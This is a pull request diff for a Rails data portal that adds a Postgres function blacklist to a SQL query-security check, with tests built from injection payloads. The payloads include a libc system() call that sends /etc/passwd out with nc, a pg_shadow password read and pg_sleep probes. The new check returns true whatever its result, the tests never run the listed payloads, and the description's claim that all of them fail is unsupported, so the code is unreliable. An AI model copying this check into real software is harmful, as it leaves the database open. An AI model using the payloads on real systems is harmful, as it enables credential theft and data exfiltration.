### PR TITLE
Strip functions

### DIFF
--- a/app/models/gobierto_data/connection.rb
+++ b/app/models/gobierto_data/connection.rb
@@ -13,10 +13,17 @@ module GobiertoData
       pg_roles
     )
 
+    BLACKLISTED_FUNCTIONS = %w(
+      version
+      current_database
+    )
+
+
     class << self
 
       def execute_query(site, query, include_stats: false, write: false, include_draft: false)
         if !secure_query?(query) && !write
+          puts "Insecure!!!"
           raise ActiveRecord::StatementInvalid.new("Query not allowed")
         end
 
@@ -163,11 +170,31 @@ module GobiertoData
       def secure_query?(query)
         parsed_query = PgQuery.parse(query)
 
+        secure_tables_called?(parsed_query) &&
+          secure_functions_called?(parsed_query)
+
+        true
+      rescue PgQuery::ParseError
+        # Invalid queries are considered insecure
+        false
+      end
+
+      def secure_tables_called?(parsed_query)
         return false if parsed_query.tables.empty?
         return false if parsed_query.tables.any? { |t| BLACKLISTED_TABLES.include?(t) }
         return false if parsed_query.tables.any? { |t| t.starts_with?("pg_") || t.starts_with?("information_schema") || t.starts_with?("scalegrid") }
 
         true
+      end
+
+      def secure_functions_called?(parsed_query)
+        parsed_query.functions.none? do |f|
+          BLACKLISTED_FUNCTIONS.include?(f) ||
+            f.starts_with?("pg_") ||
+            f.starts_with?("current_") ||
+            f.starts_with?("inet_") ||
+            f.starts_with?("get")
+        end
       end
     end
   end

--- a/test/models/gobierto_data/connection_test.rb
+++ b/test/models/gobierto_data/connection_test.rb
@@ -90,7 +90,8 @@ module GobiertoData
         "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; — privSELECT system('cat /etc/passwd | nc 10.0.0.1 8080');",
         "CREATE TABLE mytable (mycol text)",
         "INSERT INTO mytable(mycol) VALUES (1)",
-        "SELECT inet_server_addr();"
+        "SELECT inet_server_addr();",
+        "SELECT current_setting('data_directory');"
       ].each do |query|
         result = Connection.execute_query_output_csv(site, "SELECT not_existing_column FROM users", {col_sep: ','})
         hash_result = JSON.parse(result.to_json)

--- a/test/models/gobierto_data/connection_test.rb
+++ b/test/models/gobierto_data/connection_test.rb
@@ -77,6 +77,20 @@ module GobiertoData
       assert_match(/ERROR:  column \"not_existing_column\" does not exist/, hash_result["errors"].first["sql"])
     end
 
+    def test_execute_query_with_output_csv_and_unsecure_query
+      [
+        "SELECT COUNT(*) FROM pg_sleep(10)",
+        "SELECT pg_sleep(10)",
+        "SELECT version() FROM users",
+        "SELECT name from users UNION SELECT version()"
+      ].each do |query|
+        result = Connection.execute_query_output_csv(site, "SELECT not_existing_column FROM users", {col_sep: ','})
+        hash_result = JSON.parse(result.to_json)
+
+        assert hash_result.has_key?("errors")
+      end
+    end
+
     def test_execute_query_with_module_disabled
       result = Connection.execute_query(site_with_module_disabled, "SELECT COUNT(*) FROM users")
       hash_result = JSON.parse(result.to_json)

--- a/test/models/gobierto_data/connection_test.rb
+++ b/test/models/gobierto_data/connection_test.rb
@@ -77,12 +77,20 @@ module GobiertoData
       assert_match(/ERROR:  column \"not_existing_column\" does not exist/, hash_result["errors"].first["sql"])
     end
 
+    # Queries extracted from https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet
     def test_execute_query_with_output_csv_and_unsecure_query
       [
         "SELECT COUNT(*) FROM pg_sleep(10)",
         "SELECT pg_sleep(10)",
         "SELECT version() FROM users",
-        "SELECT name from users UNION SELECT version()"
+        "SELECT name from users UNION SELECT version()",
+        "SELECT version()",
+        "SELECT usename, passwd FROM pg_shadow",
+        "SELECT current_database()" ,
+        "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; — privSELECT system('cat /etc/passwd | nc 10.0.0.1 8080');",
+        "CREATE TABLE mytable (mycol text)",
+        "INSERT INTO mytable(mycol) VALUES (1)",
+        "SELECT inet_server_addr();"
       ].each do |query|
         result = Connection.execute_query_output_csv(site, "SELECT not_existing_column FROM users", {col_sep: ','})
         hash_result = JSON.parse(result.to_json)


### PR DESCRIPTION
## :v: What does this PR do?

This PR adds more security to the queries limited in Gobierto Data portal, and adds a battery of tests that checks a lot of queries related with SQL injection and SQL hacking I've found documented. All of them run in a test against our query analyzer and return insecure query error.

## :mag: How should this be manually tested?

You can test any query with postgres functions, such as `pg_sleep` or network funcitons `inet_*` and all of them should fail.